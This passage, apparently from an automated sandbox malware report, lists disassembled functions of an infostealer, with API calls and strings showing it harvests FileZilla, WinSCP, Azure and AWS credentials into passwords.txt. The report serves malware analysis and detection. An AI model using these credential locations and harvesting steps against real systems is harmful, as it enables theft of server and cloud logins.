                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F80A
                                                    • lstrcatA.KERNEL32(?,00428E9C,?,?,00000000), ref: 0040F818
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F82A
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F838
                                                    • lstrcatA.KERNEL32(?,Login: ,?,?,00000000), ref: 0040F846
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F858
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F866
                                                    • lstrcatA.KERNEL32(?,Password: ,?,?,00000000), ref: 0040F874
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F886
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F894
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F8A2
                                                    • strtok_s.MSVCRT ref: 0040F8E6
                                                    • lstrlenA.KERNEL32(?), ref: 0040F8F9
                                                    • memset.MSVCRT ref: 0040F945
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                    • API String ID: 337689325-935134978
                                                    • Opcode ID: a358bed2afddcb691bf3eb9815f41cac8d9659a7934161689147790a8998b7b4
                                                    • Instruction ID: cb87564d6211e170e05c38b81ed1cc48c71a1e5bea5364b891eb95abf759db1c
                                                    • Opcode Fuzzy Hash: a358bed2afddcb691bf3eb9815f41cac8d9659a7934161689147790a8998b7b4
                                                    • Instruction Fuzzy Hash: 3FC11A72900118AEDF00FBE1ED56AED7739AF15305F94402AF116B51F1EF395A88CB68
                                                    Function 0040EECC Relevance: 61.7, APIs: 21, Strings: 14, Instructions: 410registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0040EEEE
                                                    • memset.MSVCRT ref: 0040EF12
                                                    • memset.MSVCRT ref: 0040EF2F
                                                    • memset.MSVCRT ref: 0040EF4C
                                                    • memset.MSVCRT ref: 0040EF62
                                                    • memset.MSVCRT ref: 0040EF78
                                                    • memset.MSVCRT ref: 0040EF8E
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040EFC3
                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,0041990E), ref: 0040EFF6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memset$OpenValue
                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                    • API String ID: 1966332187-2798830873
                                                    • Opcode ID: 55e65f1442cb9368854d78b89c2310ca7c47ee3b8afe95571b1dd498a69119b2
                                                    • Instruction ID: c46821c6dde54d7fdc4e97e9647d6a3cfef6248c0bb444e840b6e235717427d9
                                                    • Opcode Fuzzy Hash: 55e65f1442cb9368854d78b89c2310ca7c47ee3b8afe95571b1dd498a69119b2
                                                    • Instruction Fuzzy Hash: BEF10171900219AADB20EB91DC56FEE7778AF14305F5000BBF605B61E1DB786B88CF69
                                                    Function 0040ACD0 Relevance: 59.7, APIs: 32, Strings: 2, Instructions: 247stringmemoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000,?,004251E8,00000000,?,?,00425200), ref: 0040ADA3
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040ADBF
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040ADCA
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040ADDC
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040ADE7
                                                    • ReadFile.KERNEL32(00000000,?,00000000,0040BF1B,00000000), ref: 0040AE05
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040AE12
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040AE19
                                                    • StrStrA.SHLWAPI(?), ref: 0040AE2B
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AE50
                                                    • lstrcatA.KERNEL32(?), ref: 0040AE6B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AE7D
                                                    • lstrcatA.KERNEL32(?,00428E50), ref: 0040AE8B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AE9D
                                                    • lstrcatA.KERNEL32(?,00428E4C), ref: 0040AEAB
                                                    • lstrcatA.KERNEL32(?), ref: 0040AEBA
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AEC6
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AED4
                                                    • StrStrA.SHLWAPI(?), ref: 0040AEE5
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AEFA
                                                    • lstrcatA.KERNEL32(?), ref: 0040AF15
                                                      • Part of subcall function 0040AB80: memset.MSVCRT ref: 0040ABB0
                                                      • Part of subcall function 0040AB80: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,?,?,0040AF23,00000000), ref: 0040ABCC
                                                      • Part of subcall function 0040AB80: CryptStringToBinaryA.CRYPT32(?,00000000,?,?,0040AF23,00000000), ref: 0040ABD6
                                                      • Part of subcall function 0040AB80: memcpy.MSVCRT ref: 0040AC63
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AF28
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AF36
                                                    • StrStrA.SHLWAPI(?), ref: 0040AF47
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AF5C
                                                    • lstrcatA.KERNEL32(?), ref: 0040AF77
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040AC92
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040ACA5
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040ACC2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AF8A
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AF98
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AFA6
                                                    • lstrlenA.KERNEL32(?), ref: 0040AFC2
                                                    • memset.MSVCRT ref: 0040B008
                                                    • CloseHandle.KERNEL32(?), ref: 0040B013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCreateCryptHandleProcessReadSizeStringmemcpy
                                                    • String ID: $passwords.txt
                                                    • API String ID: 1130354886-2417084464
                                                    • Opcode ID: e27dee67eaa8137fc15ce88d99f898602aeff498da795228a011ab0127cd3bad
                                                    • Instruction ID: 519638182b9b54bea7e777a7a648870d54dc9fa6b37f4d80f0e6037969fabad9
                                                    • Opcode Fuzzy Hash: e27dee67eaa8137fc15ce88d99f898602aeff498da795228a011ab0127cd3bad
                                                    • Instruction Fuzzy Hash: 55A10676900208AFDF01AFA0ED4ABEDBBB6FF09305F245029F512B61B1DB395954CB54
                                                    Function 1FB05660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                                    • API String ID: 0-209218429
                                                    • Opcode ID: 3826e9e0a1bcedf2d2f60d3264cec2b77d09fbc0d7c788dc3c2ba60ab7e08ed0
                                                    • Instruction ID: 2aff467a436456621409fc131d36307e609bf89deefbcd4b6440d31983bb1c6e
                                                    • Opcode Fuzzy Hash: 3826e9e0a1bcedf2d2f60d3264cec2b77d09fbc0d7c788dc3c2ba60ab7e08ed0
                                                    • Instruction Fuzzy Hash: AAF115746043029FC710DF25D980A9BBBF9FF84324F440468EE4A87651E73AF965DB62
                                                    Function 1FA4CC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                    • API String ID: 0-1613945299
                                                    • Opcode ID: 2463e0c013310215f74e434b83c338f36d8f8e0f817db248ca7f9b33245b1872
                                                    • Instruction ID: 08ef06fc8a6d7e135f3192e10843e7f0335c3cc2ccce31f1b4d48e89d4772675
                                                    • Opcode Fuzzy Hash: 2463e0c013310215f74e434b83c338f36d8f8e0f817db248ca7f9b33245b1872
                                                    • Instruction Fuzzy Hash: 2DF104B5E08741AFD300CB64CD55F5FB7EABF89304F584A1DF88496241E63DEA4887A2
                                                    Function 1FAC9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                    • API String ID: 0-1242591684
                                                    • Opcode ID: aecde35de967021b1f0f1611d6a92669721ad76f33ceaa8a334f1d920d0911e4
                                                    • Instruction ID: 3e0f0ebd32269207a75d13695ddcd4c4952cbd89fbc5346ba0f7b96afe9518ba
                                                    • Opcode Fuzzy Hash: aecde35de967021b1f0f1611d6a92669721ad76f33ceaa8a334f1d920d0911e4
                                                    • Instruction Fuzzy Hash: 44C1F1B56043029BDB108F25CD84B977BF9FF48728F040168EA4A86752E73EF525DBA1
                                                    Function 1FB7B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                    • API String ID: 0-900822179
                                                    • Opcode ID: 85f0452e75a2f3d531b6b473b9f52537f56758a7586ee4ab33b74646c775f4f4
                                                    • Instruction ID: f8352a5696620f11f58705d55f474a780b759fa8f2311a5adb6102bca0f66d4c
                                                    • Opcode Fuzzy Hash: 85f0452e75a2f3d531b6b473b9f52537f56758a7586ee4ab33b74646c775f4f4
                                                    • Instruction Fuzzy Hash: 93911A759083059BCB00DF14D840BAB77E5FF41304F498A4DFAA58B296DB3AE5468BA1
                                                    Function 1FA3D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                    • API String ID: 0-449611708
                                                    • Opcode ID: 92d7eafd0aa0307798801852d9d4d862fb80d3b81f40b05bec9504d6b7607d4e
                                                    • Instruction ID: 54b11be8d344b4642373a1467e0098964840412834b829edbea11fcaa6270ba2
                                                    • Opcode Fuzzy Hash: 92d7eafd0aa0307798801852d9d4d862fb80d3b81f40b05bec9504d6b7607d4e
                                                    • Instruction Fuzzy Hash: 6B516BB4F94316A7E7105A65AED0FDB76E46F0072AF000074FE48A6342F76DF21992E2
                                                    Function 1FBB7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                    • API String ID: 0-2933911573
                                                    • Opcode ID: 8c26c0517612a78bc644d8e6f419305a33400e51cc59885e25158f41eb7849a6
                                                    • Instruction ID: 75764fbc989619376f4f310db7147773a7c4721918ffcd51193eedd84fdd8d8a
                                                    • Opcode Fuzzy Hash: 8c26c0517612a78bc644d8e6f419305a33400e51cc59885e25158f41eb7849a6
                                                    • Instruction Fuzzy Hash: F4A15C75A043025FE7009B25AC81BFA7796DF45321F4801A9ED849A282F66FF12FD7B1
                                                    Function 00417C93 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 121stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 00417CAA
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417CD1
                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00417CEE
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 004177EB
                                                      • Part of subcall function 004177D3: FindFirstFileA.KERNEL32(?,?), ref: 00417802
                                                    • memset.MSVCRT ref: 00417D2E
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417D55
                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00417D72
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,00425240), ref: 00417830
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,0042523C), ref: 00417846
                                                      • Part of subcall function 004177D3: FindNextFileA.KERNEL32(000000FF,?), ref: 00417AE3
                                                      • Part of subcall function 004177D3: FindClose.KERNEL32(000000FF), ref: 00417AF7
                                                    • memset.MSVCRT ref: 00417DB2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417DD9
                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00417DF6
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 0041786B
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,00425200), ref: 0041787C
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 00417899
                                                      • Part of subcall function 004177D3: PathMatchSpecA.SHLWAPI(?,?), ref: 004178CD
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?,000003E8), ref: 004178F9
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,004251E8), ref: 0041790B
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?), ref: 0041791B
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,004251E8), ref: 0041792D
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?), ref: 00417941
                                                    • memset.MSVCRT ref: 00417E36
                                                    Strings
                                                    Memory Dump Source
